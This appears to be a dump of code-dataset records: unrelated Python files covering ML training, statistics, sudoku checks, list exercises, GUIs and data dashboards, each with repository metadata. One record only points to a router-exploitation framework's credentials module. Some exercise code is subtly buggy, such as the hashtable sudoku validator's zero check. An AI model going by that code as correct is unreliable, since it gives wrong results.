# training functions
def cross_entropy(logits, targets, axis = -1, ignore_index = 0):
logprobs = nn.log_softmax(logits, axis = axis)
nll = np.take_along_axis(logprobs, np.expand_dims(targets, axis = axis), axis = axis)
# mask for loss is engineered so that it learns from the first padding token
# the padding token is reused as end-of-string for simplicity
mask = (targets != ignore_index)
eos_mask = (~mask).cumsum(axis = -1) == 1
mask = mask | eos_mask
ce = -np.mean(nll[mask])
return ce
def get_train_loss_fn(model, data_parallel = False):
map_fn = pmap if data_parallel else vmap
batch_model_apply = jit(map_fn(model.apply, in_axes = (None, None, 0), out_axes = 0))
@value_and_grad
def loss_fn(params, key, data):
inp, labels = data[:, :-1], data[:, 1:]
logits = batch_model_apply(params, key, inp)
return cross_entropy(logits, labels, axis = -1)
return loss_fn
# sampling functions
def select_top_k(tensor, k):
values, _ = top_k(tensor, k)
mask = tensor > values.min()
return mask, np.where(mask, tensor, 0.)
def gumbel_noise(rng, shape):
noise = random.uniform(rng, shape = shape, minval = 0., maxval = 1.)
return -log(-log(noise))
def sample(rng, fn, params, prime, length, top_k = None, add_bos = False):
start_pos = prime.shape[-1]
pad_right = length - prime.shape[-1]
padding = (0, pad_right) if not add_bos else (1, pad_right - 1)
seq = np.pad(prime, padding)
one_hots = np.eye(length, dtype = int)
for curr_pos in range(start_pos, length):
logits = fn(params, next(rng), seq)
logits = logits[curr_pos - 1]
noise = gumbel_noise(next(rng), logits.shape)
if exists(top_k):
mask, logits = select_top_k(logits, top_k)
noise *= mask
logits += noise
sampled_ind = np.argmax(logits, axis = -1)
one_hot = one_hots[curr_pos]
seq += one_hot * sampled_ind
# for now, just set everything after second padding token (eos) to padding
remove_after_eos_mask = (seq == 0).cumsum(axis = -1) > 1
seq *= ~remove_after_eos_mask
return seq
# rng hacks
def hardware_uniform(
rng_key,
shape,
dtype = np.float32,
minval = np.float32(0),
maxval = np.float32(1)
):
del rng_key
minval = lax.convert_element_type(minval, dtype)
maxval = lax.convert_element_type(maxval, dtype)
return lax.rng_uniform(minval, maxval, shape)
def hardware_bernoulli(rng_key, p = np.float32(0.5), shape = None):
del rng_key
return lax.rng_uniform(0.0, 1.0, shape) < p
def set_hardware_rng_(jax):
jax.random.bernoulli = hardware_bernoulli
jax.random.uniform = hardware_uniform
jax._src.random.uniform = hardware_uniform
|
[
"lucidrains@gmail.com"
] |
lucidrains@gmail.com
|
09f225cdf22472b45c1d1f9d140bd0d5ee2c897f
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Scripts/Lazymux/routersploit/routersploit/modules/creds/cameras/honeywell/ssh_default_creds.py
|
6477710e7ac7b6aa711f719e0a907bb616b6175d
|
[] |
no_license
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:39364c7930721e7cc70c7da8107affc5b3e0356146825b0ee4d41d5a6b47b20f
size 858
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
6d4d9a6b5cf7732ea1bdc9a1514340ec7eafad4d
|
0a9e72d2527a2d82086b8c56ef23c9e9903e3da3
|
/russian_roulette/RussianRoulette.py
|
d0c2ba3861197b9d51598f15d79a22c7e5a55170
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause"
] |
permissive
|
karlnapf/ozone-roulette
|
6bfcab10dee8b9dd95833bd15c1a3702c2f9769e
|
df99b11c3b00a27440b094427d485b2fea858903
|
refs/heads/master
| 2021-01-01T05:30:21.389668
| 2015-02-03T09:09:40
| 2015-02-03T09:10:01
| 12,896,509
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,664
|
py
|
from abc import abstractmethod
from numpy.lib.function_base import delete
from numpy.ma.core import mean, zeros, log, arange, std
from numpy.random import permutation, rand
import logging
class RussianRoulette(object):
def __init__(self, threshold, block_size=1):
self.threshold = threshold
self.block_size = block_size
@abstractmethod
def get_estimate(self, estimates, index):
start_idx = index * self.block_size
stop_idx = index * self.block_size + self.block_size
# if there are enough samples, use them, sub-sample if not
if stop_idx <= len(estimates):
logging.debug("Averaging over %d samples from index %d to %d" %
(self.block_size, start_idx, stop_idx))
indices = arange(start_idx, stop_idx)
else:
logging.debug("Averaging over a random subset of %d samples" %
self.block_size)
indices = permutation(len(estimates))[:self.block_size]
return mean(estimates[indices])
def exponential(self, estimates):
logging.debug("Entering")
# find a strict lower bound on the estimates and remove it from list
bound = estimates.min()
bound_idx = estimates.argmin()
estimates = delete(estimates, bound_idx)
estimates = estimates - bound
# find an integer close to the mean of the transformed estimates and divide
E = max(int(round(abs(mean(estimates)))), 1)
estimates = estimates / E
logging.info("Using %f as lower bound on estimates" % bound)
logging.info("Computing product of E=%d RR estimates" % E)
logging.info("Std-deviation after scaling is %f" % std(estimates))
# index for iterating through the used estimates
# (might be averaged, so might be lower than the number of available estimates
# if the block size is greater than one
estimate_idx = 0
samples = zeros(E)
for iteration in range(E):
weight = 1
# start with x^0 which is 1
samples[iteration] = 1
term = 1
# index for computed samples
series_term_idx = 1
while weight > 0:
# update current term of infinite series
# average over block
x_inner = self.get_estimate(estimates, estimate_idx)
term *= (x_inner / series_term_idx)
# if summation has reached threshold, update weights
if abs(term) < self.threshold:
q = term / self.threshold
if rand() < q:
# continue and update weight
weight = weight / q
else:
# stop summation
weight = 0
samples[iteration] += weight * term;
estimate_idx += 1
series_term_idx += 1
logging.info("RR estimate %d/%d with threshold %.2f is %.4f and took %d series terms" %
(iteration + 1, E, self.threshold, samples[iteration], series_term_idx))
# now put things together. Note that samples contains an unbiased estimate
# which might be quite small. However, due to the removal of the bound,
# this will not cause an underflow and we can just take the log.
logging.debug("Leaving")
return bound + sum(log(samples));
|
[
"heiko.strathmann@gmail.com"
] |
heiko.strathmann@gmail.com
|
5e392dbeec98a689c52d64e02a4d0985d70efdef
|
8afb5afd38548c631f6f9536846039ef6cb297b9
|
/_MY_ORGS/Web-Dev-Collaborative/blog-research/Data-Structures/1-Python/matrix/sudoku_validator.py
|
7bda6e4241502010a2301498fe39b6c447b205d9
|
[
"MIT"
] |
permissive
|
bgoonz/UsefulResourceRepo2.0
|
d87588ffd668bb498f7787b896cc7b20d83ce0ad
|
2cb4b45dd14a230aa0e800042e893f8dfb23beda
|
refs/heads/master
| 2023-03-17T01:22:05.254751
| 2022-08-11T03:18:22
| 2022-08-11T03:18:22
| 382,628,698
| 10
| 12
|
MIT
| 2022-10-10T14:13:54
| 2021-07-03T13:58:52
| null |
UTF-8
|
Python
| false
| false
| 2,478
|
py
|
"""
Write a function validSolution/ValidateSolution/valid_solution() that accepts a 2D array representing a Sudoku board, and returns true if it is a valid solution, or false otherwise. The cells of the sudoku board may also contain 0's, which will represent empty cells. Boards containing one or more zeroes are considered to be invalid solutions.
The board is always 9 cells by 9 cells, and every cell only contains integers from 0 to 9.
(More info at: http://en.wikipedia.org/wiki/Sudoku)
"""
# Using dict/hash-table
from collections import defaultdict
def valid_solution_hashtable(board):
for i in range(len(board)):
dict_row = defaultdict(int)
dict_col = defaultdict(int)
for j in range(len(board[0])):
value_row = board[i][j]
value_col = board[j][i]
if not value_row or value_col == 0:
return False
if value_row in dict_row:
return False
else:
dict_row[value_row] += 1
if value_col in dict_col:
return False
else:
dict_col[value_col] += 1
for i in range(3):
for j in range(3):
grid_add = 0
for k in range(3):
for l in range(3):
grid_add += board[i*3+k][j*3+l]
if grid_add != 45:
return False
return True
# Without hash-table/dict
def valid_solution(board):
correct = [1, 2, 3, 4, 5, 6, 7, 8, 9]
# check rows
for row in board:
if sorted(row) != correct:
return False
# check columns
for column in zip(*board):
if sorted(column) != correct:
return False
# check regions
for i in range(3):
for j in range(3):
region = []
for line in board[i*3:(i+1)*3]:
region += line[j*3:(j+1)*3]
if sorted(region) != correct:
return False
# if everything correct
return True
# Using set
def valid_solution_set (board):
valid = set(range(1, 10))
for row in board:
if set(row) != valid:
return False
for col in [[row[i] for row in board] for i in range(9)]:
if set(col) != valid:
return False
for x in range(3):
for y in range(3):
if set(sum([row[x*3:(x+1)*3] for row in board[y*3:(y+1)*3]], [])) != valid:
return False
return True
|
[
"bryan.guner@gmail.com"
] |
bryan.guner@gmail.com
|
542a65e7cf0987e43c313ec125817c182f6c4308
|
e66eb0234d09b732b52c839058a830bee486fd30
|
/list_operations.py
|
6e136a5fe261e154cc5ab0633b4d3bcc537ce7b0
|
[] |
no_license
|
nt-git/list-slicing
|
44d10c350b0e0248cfcc18cf795bab07bb5f4a5b
|
5f8a8290a4b040bef1ddbfe7b6e559a46d01f67e
|
refs/heads/master
| 2021-05-14T13:08:26.640954
| 2018-01-05T21:08:11
| 2018-01-05T21:08:11
| 116,427,201
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,306
|
py
|
"""Functions that manipulate lists without using Python's built-in list methods.
The fundamental operations on lists in Python are those that are part of the
language syntax and/or cannot be implemented in terms of other list operations.
They include:
* List indexing (some_list[index])
* List indexing assignment (some_list[index] = value)
* List slicing (some_list[start:end])
* List slicing assignment (some_list[start:end] = another_list)
* List index deletion (del some_list[index])
* List slicing deletion (del some_list[start:end])
Implement functions that each use just one of the above operations.
The docstring of each function describes what it should do.
DO NOT USE ANY OF THE BUILT IN LIST METHODS, OR len()!
"""
def head(input_list):
"""Return the first element of the input list.
For example:
>>> head(['Jan', 'Feb', 'Mar'])
'Jan'
"""
return input_list[0]
def tail(input_list):
"""Return all elements of the input list except the first.
For example:
>>> tail(['Jan', 'Feb', 'Mar'])
['Feb', 'Mar']
"""
return input_list[1:]
def last(input_list):
"""Return the last element of the input list.
For example:
>>> last(['Jan', 'Feb', 'Mar'])
'Mar'
"""
return input_list[-1]
def init(input_list):
"""Return all elements of the input list except the last.
For example:
>>> init(['Jan', 'Feb', 'Mar'])
['Jan', 'Feb']
"""
return input_list[:-1]
##############################################################################
# Do yourself a favor and get a short code review here.
def first_three(input_list):
"""Return the first three elements of the input list.
For example:
>>> first_three(['Jan', 'Feb', 'Mar', 'Apr', 'May'])
['Jan', 'Feb', 'Mar']
"""
return input_list[0:3]
def last_five(input_list):
"""Return the last five elements of the input list.
For example:
>>> last_five([0, 3, 6, 9, 12, 15, 18, 21, 24, 27])
[15, 18, 21, 24, 27]
"""
return input_list[-5:]
def middle(input_list):
"""Return all elements of input_list except the first two and the last two.
For example:
>>> middle([0, 3, 6, 9, 12, 15, 18, 21, 24, 27])
[6, 9, 12, 15, 18, 21]
"""
return input_list[2:-2]
def inner_four(input_list):
"""Return the third, fourth, fifth, and sixth elements of input_list.
For example:
>>> inner_four([0, 3, 6, 9, 12, 15, 18, 21, 24, 27])
[6, 9, 12, 15]
"""
return input_list[2:6]
def inner_four_end(input_list):
"""Return the elements that are 6th, 5th, 4th, and 3rd from the end of input_list.
This function should return those elements in a list, in the exact order
described above.
For example:
>>> inner_four_end([0, 3, 6, 9, 12, 15, 18, 21, 24, 27])
[12, 15, 18, 21]
"""
return input_list[-6:-2]
def replace_head(input_list):
"""Replace the head of input_list with the value 42 and return nothing.
For example:
>>> multiples = [0, 3, 6, 9, 12, 15, 18, 21, 24, 27]
>>> replace_head(multiples)
>>> multiples == [42, 3, 6, 9, 12, 15, 18, 21, 24, 27]
True
"""
input_list[0] = 42
return
def replace_third_and_last(input_list):
"""Replace third and last elements of input_list with 37 and return nothing.
For example:
>>> multiples = [0, 3, 6, 9, 12, 15, 18, 21, 24, 27]
>>> replace_third_and_last(multiples)
>>> multiples == [0, 3, 37, 9, 12, 15, 18, 21, 24, 37]
True
"""
input_list[2] = 37
input_list[-1] = 37
return
def replace_middle(input_list):
"""Replace all elements of a list but the first and last two with 42 and 37.
After the replacement, 42 and 37 should appear in that order in input_list.
Return nothing.
For example:
>>> multiples = [0, 3, 6, 9, 12, 15, 18, 21, 24, 27]
>>> replace_middle(multiples)
>>> multiples == [0, 3, 42, 37, 24, 27]
True
"""
input_list[2:-2] = [42, 37]
return
def delete_third_and_seventh(input_list):
"""Remove third and seventh elements of input_list and return nothing.
For example:
>>> notes = ['Do', 'Re', 'Mi', 'Fa', 'So', 'La', 'Ti', 'Do']
>>> delete_third_and_seventh(notes)
>>> notes == ['Do', 'Re', 'Fa', 'So', 'La', 'Do']
True
"""
del input_list[2]
del input_list[5]
return
def delete_middle(input_list):
"""Remove all elements from input_list except the first two and last two.
Return nothing.
For example:
>>> notes = ['Do', 'Re', 'Mi', 'Fa', 'So', 'La', 'Ti', 'Do']
>>> delete_middle(notes)
>>> notes == ['Do', 'Re', 'Ti', 'Do']
True
"""
while len(input_list) > 4 :
input_list.pop(2)
return
##############################################################################
# END OF MAIN EXERCISE. Yay! You did it! You Rock!
#
# Please ask for a code review from an Education team member before proceeding.
##############################################################################
# This is the part were we actually run the doctests.
if __name__ == "__main__":
import doctest
result = doctest.testmod()
if result.failed == 0:
print "ALL TESTS PASSED"
|
[
"no-reply@hackbrightacademy.com"
] |
no-reply@hackbrightacademy.com
|
5e10aabc613ae7de645ef94312a9a1bc985b98cf
|
aa0366a8632f334fb35e6bdc78717f3456202eb7
|
/bp/characterKit.py
|
21b2ade02cf6076383350c1d725ab0a82e74ea12
|
[] |
no_license
|
Mortaciunea/bdScripts
|
0891478096f3a5876655896c9649c0a7204d5ee8
|
4f6e9d2b181bb4a90c1ccfcaca64c22ecbe0dd59
|
refs/heads/master
| 2020-12-24T13:36:57.930038
| 2015-09-03T16:03:46
| 2015-09-03T16:03:46
| 41,869,547
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,057
|
py
|
import pymel.core as pm
import pymel.core.datatypes as dt
import re,os,shutil,glob
import logging
import shiboken
import PySide.QtGui as QtGui
import PySide.QtCore as QtCore
import maya.OpenMayaUI
def get_maya_window():
maya_window_util = maya.OpenMayaUI.MQtUtil.mainWindow()
maya_window = shiboken.wrapInstance( long( maya_window_util ), QtGui.QWidget )
return maya_window
characterKitWin = 'characterKitWindow'
class CharacterKitUI(QtGui.QMainWindow):
def __init__(self,parent=get_maya_window()):
if pm.window( characterKitWin, exists = True, q = True ):
pm.deleteUI( characterKitWin)
super(CharacterKitUI,self).__init__(parent)
self.setObjectName(characterKitWin)
self.setWindowTitle('Character Kit 2.1')
centralWidget = QtGui.QWidget()
mainLayout = QtGui.QVBoxLayout()
leftSideListsLSplitter = QtGui.QSplitter(QtCore.Qt.Vertical)
rightSideListsLSplitter = QtGui.QSplitter(QtCore.Qt.Horizontal)
#left side lists
#characters list
self.charactersList = QtGui.QListView()
#skins list
self.skinsList = QtGui.QListView()
#body parts list
self.bodyPartsList = QtGui.QListView()
leftSideListsLSplitter.addWidget(self.charactersList)
leftSideListsLSplitter.addWidget(self.skinsList)
leftSideListsLSplitter.addWidget(self.bodyPartsList)
mainLayout.addWidget(leftSideListsLSplitter)
centralWidget.setLayout(mainLayout)
self.setCentralWidget(centralWidget)
#menu bar
self.addMenu()
self.show()
self.resize(860,600)
def addMenu(self):
self.menuBar = self.menuBar()
self.fileMenu = self.menuBar.addMenu('File')
self.fileMenu.addAction('Load skeleton')
self.fileMenu.addAction('Save skeleton')
self.toolsMenu = self.menuBar.addMenu('Tools')
self.toolsMenu.addAction('Create Picking Geometry')
|
[
"ender_bd@yahoo.com"
] |
ender_bd@yahoo.com
|
400ddf4c1c830f1adf3d42e1f2ef065c19735ef2
|
b08b373d78fb42dbb11aebeadf71168dc6476696
|
/pycharm_programs/mme-methods/henbgw_count.py
|
d84e97c0fedf37a1d818f56f5e2f6731fc524b0b
|
[] |
no_license
|
lajapathy/python-practice
|
40a44a026546d1f3414452a99a68487a14df3c02
|
869a59cad89077327bb8117c34801af985a63e0d
|
refs/heads/master
| 2022-02-25T14:59:52.155959
| 2019-09-24T07:16:58
| 2019-09-24T07:16:58
| 121,089,806
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 950
|
py
|
import re
def henbgw_count(self):
for chassis in self.get_dut_list():
config_lines = self._send(["show config"], chassis)
henbgw_mgmt_db_name_from_config = ''
henbgw_mgmt_db_name_from_cli_output = ''
for line in config_lines:
if "associate henbgw-mgmt-db" in line:
henbgw_mgmt_db_name_from_config = re.match('\s*associate henbgw-mgmt-db\s*(.*)\s*',line).group(1)
break
cli_output = self._send(["show lte-policy mme henbgw mgmt-db summary"], chassis)
for line in cli_output:
if "HenbGW Management DB" in line:
henbgw_mgmt_db_name_from_cli_output = re.match('\s*HenbGW Management DB\s*(.*)\s*',line).group(1)
break
if henbgw_mgmt_db_name_from_cli_output != henbgw_mgmt_db_name_from_config:
return SystestResult(1, henbgw_mgmt_db_name_from_cli_output)
#Now, we verify henbgw count
|
[
"lamadhus@cisco.com"
] |
lamadhus@cisco.com
|
0dc4c9fb7b5faa84b43a579fbd289c735ff7794f
|
8fd92c0a65c9b3e3912b6e8ef043656ee225880a
|
/EXAMPLES/np_create_ranges.py
|
e1aa89ab7ab9a7f0785f17f77b6c152021baa25a
|
[] |
no_license
|
waiteb15/py3forsci3day
|
9fbcbb59f1c14f3d91cb2599d7ca8b4d6ac628c4
|
fc664042618f0910d40e85677a2438eef5cce2b7
|
refs/heads/master
| 2020-04-25T11:24:18.697218
| 2019-02-28T23:40:52
| 2019-02-28T23:40:52
| 172,743,315
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 347
|
py
|
#!/usr/bin/env python
import numpy as np
r1 = np.arange(50)
print(r1)
print("size is", r1.size)
print()
r2 = np.arange(5,101,5)
print(r2)
print("size is", r2.size)
print()
r3 = np.arange(1.0,5.0,.3333333)
print(r3)
print("size is", r3.size)
print()
r4 = np.linspace(1.0, 5.0, 7)
print(r4)
print("size is", r4.size)
print()
|
[
"waiteb15@gmail.com"
] |
waiteb15@gmail.com
|
ab6d591fb1096d67a92f1b2f9be58d471222ea9a
|
37fef592f365194c28579f95abd222cc4e1243ae
|
/streamlit/book_recommender/Overview.py
|
3a38ef090b172cb0a6ec3907446d749998ff6fca
|
[] |
no_license
|
edimaudo/Python-projects
|
be61e0d3fff63fb7bd00513dbf1401e2c1822cfb
|
85d54badf82a0b653587a02e99daf389df62e012
|
refs/heads/master
| 2023-04-07T03:26:23.259959
| 2023-03-24T12:03:03
| 2023-03-24T12:03:03
| 72,611,253
| 4
| 3
| null | 2022-10-31T18:10:41
| 2016-11-02T06:37:17
| null |
UTF-8
|
Python
| false
| false
| 3,298
|
py
|
#================
# Book Overview
#================
# Load libraries
import streamlit as st
import pandas as pd
import plotly.express as px
import os, os.path
st.title('Book Overview')
@st.cache
def load_data(DATA_URL):
data = pd.read_csv(DATA_URL)
data.dropna(inplace=True)
return data
# Load data
books = load_data("BX-Books_clean.csv")
users = load_data("BX-Users_clean.csv")
ratings = load_data("BX-Book-Ratings_clean.csv")
#====================
# Raw data
#====================
st.subheader("Book data")
with st.expander("Open to see more",expanded=False):
st.dataframe(books)
st.subheader("Book Data Summary")
# AVERAGE RATING
average_rating = "{:.2f}".format(ratings['bookRating'].mean())
# AVERAGE AGE
average_age= "{:.2f}".format(users['Age'].mean())
# NUMBER OF USERS
number_of_users = users['userID'].count()
# NUMBER OF BOOKS
number_of_books = books['ISBN'].count()
# TOP 5 PUBLISHERS AND BOTTOM 5 PUBLISHERS
book_info = books.groupby(["publisher"]).size().reset_index(name='count')
book_info.columns = ['Publisher','Count']
book_info = book_info.sort_values("Count", ascending=False)
top_5_publishers = book_info.head(5)
bottom_5_publishers = book_info.tail(5)
# TOP 5 AUTHORS AND BOTTOM 5 AUTHORS
author_info = books.groupby(["bookAuthor"]).size().reset_index(name='count')
author_info.columns = ['Author','Count']
author_info = author_info.sort_values("Count", ascending=False)
top_5_authors = author_info.head(5)
bottom_5_authors = author_info.tail(5)
# NUMBER OF BOOKS BY YEAR
book_year_info = books.groupby(["yearOfPublication"]).size().reset_index(name='count')
book_year_info.columns = ['Year','Count']
book_year_info = book_year_info.sort_values("Year", ascending=False)
# TOP AND BOTTOM 5 COUNTRIES
country_info = users.groupby(["Country"]).size().reset_index(name='count')
country_info.columns = ['Country','Count']
country_info = country_info.sort_values("Count", ascending=False)
top_5_countries = country_info.head(5)
bottom_5_countries = country_info.tail(5)
# Metrics
metric1_column, metric2_column,metric3_column,metric4_column = st.columns(4)
metric1_column.metric("Avg. Rating", average_rating)
metric2_column.metric("# of Users", number_of_users)
metric3_column.metric("# of Books", number_of_books)
metric4_column.metric("Avg. Age", average_age)
# Publisher
st.subheader("Top and Bottom 5 Publishers")
st.write("Top 5 Publishers")
output = px.bar(top_5_publishers, x="Publisher", y="Count")
st.plotly_chart(output)
st.write("Bottom 5 Publishers")
output = px.bar(bottom_5_publishers, x="Publisher", y="Count")
st.plotly_chart(output)
# Author
st.subheader("Top and Bottom 5 Authors")
st.write("Top 5 Authors")
output = px.bar(top_5_authors, x="Author", y="Count")
st.plotly_chart(output)
st.write("Bottom 5 Authors")
output = px.bar(bottom_5_authors, x="Author", y="Count")
st.plotly_chart(output)
# Country
st.subheader("Top and Bottom 5 Countries")
st.write("Top 5 Countries")
output = px.bar(top_5_countries, x="Country", y="Count")
st.plotly_chart(output)
st.write("Bottom 5 Countries")
output = px.bar(bottom_5_countries, x="Country", y="Count")
st.plotly_chart(output)
# books by year
st.subheader("Books by Year Trend")
output = px.line(book_year_info, x="Year", y="Count")
st.plotly_chart(output)
|
[
"edimaudo@gmail.com"
] |
edimaudo@gmail.com
|
bb0b96e5d3a9763e899440f021b68306c0ff6345
|
022a0cb0d0873da0c25da6b6aa8b258b80a4b7e0
|
/165.py
|
933086226d00282a90482d8c4273a8718bea1615
|
[] |
no_license
|
subayadhav/fri07061
|
31e1e89ac1be60c736450f749486651968cfeba4
|
380f5d108869ad4cde16140dc21a88f2a7972722
|
refs/heads/master
| 2020-06-01T06:43:17.094510
| 2019-06-07T08:47:49
| 2019-06-07T08:47:49
| 190,683,539
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 130
|
py
|
n1,k=map(int,input().split())
l=[int(x) for x in input().split()]
l.sort()
for i in l:
if i>k:
print(i)
break
|
[
"noreply@github.com"
] |
subayadhav.noreply@github.com
|
eb505b88bac2629ad98d57305ff289ab7e507c38
|
94d1e805521575afb7b6256af1dd6de65a50ada9
|
/problem_5/problem_5.py
|
458d419fed34ea5f74c68c10e9d6c3fe6dc7dbf6
|
[] |
no_license
|
John-W-Stevens/Euler100
|
fe2004786f64172e02ba18fbe33d95ceb68abf59
|
6f193a47e9e019b99ee9b188d2227587f5a3f4b3
|
refs/heads/master
| 2022-11-26T07:23:36.505138
| 2020-07-28T17:36:39
| 2020-07-28T17:36:39
| 274,224,709
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,828
|
py
|
# 2520 is the smallest number that can be divided by each of the numbers from 1 to 10 without any remainder.
# What is the smallest positive number that is evenly divisible by all of the numbers from 1 to 20?
import time
def is_prime(n):
""" Returns Boolean """
if n <= 1: return False
if n == 2 or n == 3: return True
if n % 2 == 0 or n % 3 == 0: return False
i, w, = 5, 2
while i * i <= n:
if n % i == 0:
return False
i += w
w = 6 - w
return True
def prime_factorization(n):
"""
Assumes n >= 2
Returns a dict mapping the prime factors of n and their respective powers
"""
if is_prime(n):
return {n: 1}
prime_factors = {2:0, 3:0,}
while n % 2 == 0:
prime_factors[2] += 1
n /= 2
while n % 3 == 0:
prime_factors[3] += 1
n /= 3
for i in range(5, int(n**0.5)+1, 2):
if not is_prime(i):
continue
while n % i == 0:
try:
prime_factors[i] += 1
except KeyError:
prime_factors[i] = 1
n /= i
return prime_factors
def problem_5(n):
""" Returns the smallest number divisible by every number <= n """
output = 1
prime_factor_map = {}
for i in range(2, n+1):
prime_factors = prime_factorization(i)
for p,e in prime_factors.items():
try:
if prime_factor_map[p] < e:
prime_factor_map[p] = e
except KeyError:
prime_factor_map[p] = e
for p,e in prime_factor_map.items():
output *= pow(p,e)
return output
start = time.time()
solution = problem_5(20)
print(f"{solution} found in {time.time() - start} seconds.")
# 232792560 found in 3.1948089599609375e-05 seconds.
|
[
"john.william.stevens1@gmail.com"
] |
john.william.stevens1@gmail.com
|
f6626102fabf2650c694713c2ad5149437e06451
|
0dec4bee4820161ae892f615023dd6ff9dae8ff4
|
/PyMrawler/SocialEventCrawlerGR/Links.py
|
40ddb5a031bebced3cf662f7c038a859ef7f5f1d
|
[] |
no_license
|
mpetyx/PyMrawler
|
8fbf77276838f3e26b746205f5ded33e9c5be559
|
6f7dc608620ddfff1c3021aa740cf8409a7eb311
|
refs/heads/master
| 2016-09-10T00:16:49.353207
| 2012-10-17T10:13:15
| 2012-10-17T10:13:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,323
|
py
|
'''
Created on 11 Dec 2011
@author: mpetyx
'''
class Link:
def __init__(self,text):
"""
Here we search all the links included in the description
"""
self.links = None
from TextHandling import TextFunctions
self.text = TextFunctions(text)
self.lines = self.text.lines
self.words = []
def links(self):
import re
# parsing addresses
# http://stackoverflow.com/questions/6173/regular-expression-for-parsing-links-from-a-webpage
self.links = re.findall(r'\b(https?|ftp|file)://[-A-Z0-9+&@#/%?=~_|!:,.;]*[-A-Z0-9+&@#/%=~_|]',self.text)
def youtube(self):
self.youtubeLinks = []
for link in self.links:
if "youtube" in link:
self.youtubeLinks.append(link)
return self.youtubeLinks
def parse_url(self):
e=r'/((http|ftp):\/)?\/?([^:\/\s]+)((\/\w+)*\/)([\w\-\.]+\.[^#?\s]+)(#[\w\-]+)?/'
e2=r'/^((http|ftp):\/)?\/?([^:\/\s]+)((\/\w+)*\/)([\w\-\.]+\.[^#?\s]+)(#[\w\-]+)?$/'
def simple_parse(self):
for line in self.lines:
if "www" in line:
print line
|
[
"mpetyx@gmail.com"
] |
mpetyx@gmail.com
|
34356c92a49affa75602a75e6add206fdd9417a7
|
012837eafe45c8f7ee5fc77d4c4d7725d5314c5c
|
/workshops/8-day/8-clazz.py
|
6322475cba90b04e02f631dcfd665c48f6e3d371
|
[
"MIT"
] |
permissive
|
ai-erorr404/opencv-practice
|
e9408cf006779a678cf3a30fc60e9dbeb3c8e493
|
60ef5e4aec61ee5f7e675fb919e8f612e59f664a
|
refs/heads/master
| 2021-02-08T11:17:04.763522
| 2020-02-22T09:43:04
| 2020-02-22T09:43:04
| 244,146,060
| 1
| 1
|
MIT
| 2020-03-01T12:35:02
| 2020-03-01T12:35:01
| null |
UTF-8
|
Python
| false
| false
| 1,854
|
py
|
#!/usr/bin/env python3
# -*- coding=utf-8 -*-
import cv2 as cv
"""
视频前景/背景提取
视频前景/背景提取技术用于提取前景移动对象,通过获取移动对象的mask实现获取移动物体的轮廓信息,最常用的方法是帧差相减法进行,即用
前一帧的图像最为背景图像与当前帧进行相减,该方法对光照、噪声相当敏感。opencv中对背景模型提取的算法有两种,一种是基于高斯模糊模型(GMM)
实现背景提取,另外一种是使用最近相邻模型(KNN)实现的,api如下:
GMM cv.createBackgroundSubtractorMOG2(history, varThreshold, detectShadows)
- history: 过往帧数,默认500帧,历史进行比较
- varThreshold: 马氏距离,默认16,值越大,最新的像素会归为前景,值越小对光照敏感
- detectShadow: 是否保留阴影检测,默认True, 开启阴影检测虽然可以提高提取效果,但是效率会变低,推荐不开启
KNN cv.createBackgroundSubtractorKNN()的参数描述如上
"""
def main():
capture = cv.VideoCapture(0)
# mog2bs = cv.createBackgroundSubtractorKNN(500, 1000, False) # KNN模型
mog2bs = cv.createBackgroundSubtractorMOG2(300) # GMM模型
while True:
ret, frame = capture.read()
if True is not ret:
print("can't read any video!")
break
mask = mog2bs.apply(frame)
background = mog2bs.getBackgroundImage()
cv.imshow("input", frame)
cv.imshow("mask", mask)
cv.imshow("background", background)
key = cv.waitKey(10) & 0xff
if 27 == key: # ESC
break
cv.destroyAllWindows()
capture.release()
if "__main__" == __name__:
main()
|
[
"afterloe@foxmail.com"
] |
afterloe@foxmail.com
|
0c1776f6bd320e7f308bee7b96fd85ce0f010a7c
|
aed0016db7f4d22e7d66e6fddb7bf4ef68a3c692
|
/neural_sp/models/seq2seq/decoders/build.py
|
0f813cfcdda9ab87c1f3eab770b881268e309039
|
[] |
no_license
|
thanhkm/neural_sp
|
6a5575111c83d1fdd97edec21f90fe647965cb69
|
1a5a5ed54f4cb79436007593dbd0d782b246a0c7
|
refs/heads/master
| 2020-12-26T23:22:56.964151
| 2020-01-15T23:40:22
| 2020-01-15T23:40:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,001
|
py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2019 Kyoto University (Hirofumi Inaguma)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Select an decoder network."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
def build_decoder(args, special_symbols, enc_n_units, vocab,
ctc_weight, ctc_fc_list, global_weight,
lm_fusion=None, lm_init=None):
if args.dec_type == 'transformer':
if args.attn_type == 'cif':
raise NotImplementedError
else:
from neural_sp.models.seq2seq.decoders.transformer import TransformerDecoder
decoder = TransformerDecoder(
special_symbols=special_symbols,
enc_n_units=enc_n_units,
attn_type=args.transformer_attn_type,
n_heads=args.transformer_n_heads,
n_layers=args.dec_n_layers,
d_model=args.transformer_d_model,
d_ff=args.transformer_d_ff,
layer_norm_eps=args.transformer_layer_norm_eps,
ffn_activation=args.transformer_ffn_activation,
pe_type=args.transformer_dec_pe_type,
vocab=vocab,
